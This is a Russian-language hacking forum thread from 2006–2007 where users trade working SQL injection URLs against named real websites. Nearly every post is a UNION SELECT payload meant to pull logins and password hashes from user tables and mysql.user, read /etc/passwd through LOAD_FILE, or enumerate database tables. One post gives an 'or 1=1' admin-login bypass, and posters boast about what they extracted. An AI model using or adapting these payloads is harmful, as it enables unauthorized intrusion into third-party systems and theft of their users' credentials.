SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://www.superski.ru/adm/show.php?news_id=-1056+union+select+1,2,3,4,5,6,7/* :D
     
    1 person likes this.
  2. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    то ли пофиксали, то ли временно не доступно
    "Error reading database"
     
    1 person likes this.
  3. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Пробелы убираем ;)
     
    1 person likes this.
  4. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    sql inj
    local inc

     
    2 people like this.
  5. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.xfoto.ru/foto_alone.php?p_id=-99'+union+select+1,2,concat(login,0x3a,password),4+from+users/*
    
    админка:
    http://www.xfoto.ru/admin/
    asd' or 1=1/* ... =\
     
    3 people like this.
  6. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    вроде всё убрал... после еще раз попробую
     
    1 person likes this.
  7. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.kontec.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
     
    2 people like this.
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =))
     
    4 people like this.
  9. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Code:
    www.comingsoon.net/news.php?id='
     
  10. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.autobalt.ru/catalog/models.php?marka_id=-1+union+select+1,2,database(),4,5,6,7/*
    //upd:

    попутно..
    скулька на сайте веб-дизайнеров, создавших вышеуказанный сайт)
    Code:
    http://www.eto-design.ru/catalog/?top_id=1&s_id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),6,7,8/*
     
    #690 n1†R0x, 5 Mar 2007
    Last edited: 5 Mar 2007
    1 person likes this.
  11. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    ))
     
    1 person likes this.
  12. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    kamaz
    Code:
    http://www.pythom.com/news.php?id=1193%20union%20select%201,user,password,4,5,6,7+from+mysql.user+limit+1,2/*
    Code:
    http://www.pythom.com/news.php?id=1193%20union%20select%201,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6,7+from+mysql.user/*
    Code:
    http://www.kladionicar.com/treba_znati.php?id=-1+union+select+1,2,3,4,concat(id,char(58),username,char(58),email),6+from+users/*
    Пароли не нашёл :)

    Code:
    http://privet.zp.ua/place.php3?id=-1+union+select+1/*
    Code:
    http://www.ajsquare.com/demo/forum_demo/topic_title.php?&head_id=20&td_id=-1%20union%20select%200,1,2,3,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),6,7,8,9,1,1,2,2,2%20from%20members/*&page=1
     
    #692 Goudini, 5 Mar 2007
    Last edited: 5 Mar 2007
    1 person likes this.
  13. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.voyage-luxe.ru/chapter532.html?uid=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x78),0x78),3,4,5,6,7+from+mysql.user/*
    уух) долго возился..
    без криптования не катит =d
    логин и hash в тайтле окна)
    //upd:
    Code:
    http://www.voyage-luxe.ru/chapter8.html?uid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x78),0x78),4,5+from+mysql.user+limit+1,1/*
     
    #693 n1†R0x, 5 Mar 2007
    Last edited: 6 Mar 2007
  14. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.diac.ru/news/comments.php?news_id=-99+union+select+1,concat(convert(login+using+cp1251),0x3a,convert(password+using+cp1251)),3,4,5,6,7,8+from+clients/*&sortirovka=id
    
    Code:
    http://relaxmusic.info/news_print.php?ntpl=1&print_id=-99+union+select+1,2,table_name,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
    
    =\
     
    #694 ice1k, 5 Mar 2007
    Last edited: 6 Mar 2007
    1 person likes this.
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Первый Альтернативный Музыкальный Телеканал
    Code:
    http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,user(),4,5/*
     
    1 person likes this.
  16. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    2 n0ne
    баянище =)
    вот вам, убивайте себе моск. там пятая версия =)
     
  17. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    сколько можно =\ уже раз 10ый наверно написали =\ :rolleyes:
     
  18. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Spyder, ice1k, да все в тэгах постят, по поиску не найдешь)) а листать каждый раз лениво, так что извиняйте.
     
    1 person likes this.
  19. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    2Goudini
    http://www.kladionicar.com/treba_znati.php?id=-1+union+select+1,2,3,4,concat(username,char(58),password),6+from+frb_user_login/* вот пассы ток хз от чего, а вообще кажеться что пассы в таблицы users лежат в колонке sifra
     
  20. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    и вот хоть один бы, кроме этого...:
    Code:
    -1163+union+select+1,2,user(),4,5/*
    
    ... 4ё-нить бы написал путнего =\
     
Thread Status:
Not open for further replies.